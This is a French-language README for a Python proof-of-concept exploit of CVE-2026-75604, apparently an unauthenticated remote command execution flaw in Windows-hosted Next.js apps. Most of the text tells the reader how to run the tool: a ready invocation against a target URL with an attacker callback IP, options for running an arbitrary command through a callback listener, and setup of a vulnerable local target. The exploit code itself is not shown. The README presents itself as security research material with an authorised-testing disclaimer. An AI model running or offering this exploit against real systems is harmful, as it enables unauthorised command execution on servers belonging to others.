
Preuve de concept pour CVE-2026-75604, une exécution de code à distance non authentifiée dans les applications Next.js hébergées sur Windows, avec exécution de commandes basée sur des rappels et configuration locale de la cible.
Preuve de concept Python pour CVE-2026-75604, une vulnérabilité d'exécution de commande à distance non authentifiée dans les applications Next.js hébergées sur Windows qui utilisent à la fois le Pages Router et l'App Router sans Cache Components.

>=13.4 <15.5.24 ou >=16.0 <16.3.3Validé avec [email protected].
python -m pip install -r requirements.txt
python poc.py --target http://TARGET:3000 --callback-ip CALLBACK_IP --pages-cache-path /PATH/TO/PAGES_ISR_INSTANCE --app-cache-path /PATH/TO/APP_CACHE_INSTANCE
Le chemin de la Server Action est par défaut /. Utilisez --action-field lorsque son formulaire comporte plusieurs champs.
Arguments obligatoires :
--target URL : URL de base de l'application Next.js--callback-ip ADDRESS : adresse IPv4 accessible par la cible--pages-cache-path PATH : page ISR dynamique existante du Pages Router--app-cache-path PATH : page dynamique existante de l'App Router adossée au cache système de fichiersArguments facultatifs :
--command COMMAND : commande à exécuter ; par défaut whoami--action-path PATH : page de l'App Router contenant la Server Action compatible ; par défaut /--action-field NAME : champ de formulaire consommé par l'action ; détecté automatiquement lorsqu'il est sans ambiguïté--callback-port PORT : port de rappel ; par défaut 4331--listen-address ADDRESS : adresse de liaison locale du rappel ; par défaut 0.0.0.0--timeout SECONDS : délai d'expiration des requêtes et du rappel ; par défaut 20--insecure : désactive la vérification du certificat TLSL'application facultative target/ épingle [email protected] et utilise le serveur de production standard de Next.js :
cd target
npm ci
npm run build
npm start
Exécutez le PoC dans un autre terminal :
python poc.py --target http://127.0.0.1:4330 --callback-ip 127.0.0.1 --pages-cache-path /pages-cache/seed --app-cache-path /app-cache/seed
La cible facultative fournit les routes requises et une Server Action compatible sur /.
Ce PoC est fourni à des fins éducatives, de recherche en sécurité et de tests autorisés uniquement. Utilisez-le uniquement sur des systèmes dont vous êtes propriétaire ou pour lesquels vous avez une autorisation explicite de test.
Crédit à evolutionstorm.
Ce PoC a été reconstruit indépendamment à partir de l'avis public et du correctif Next.js.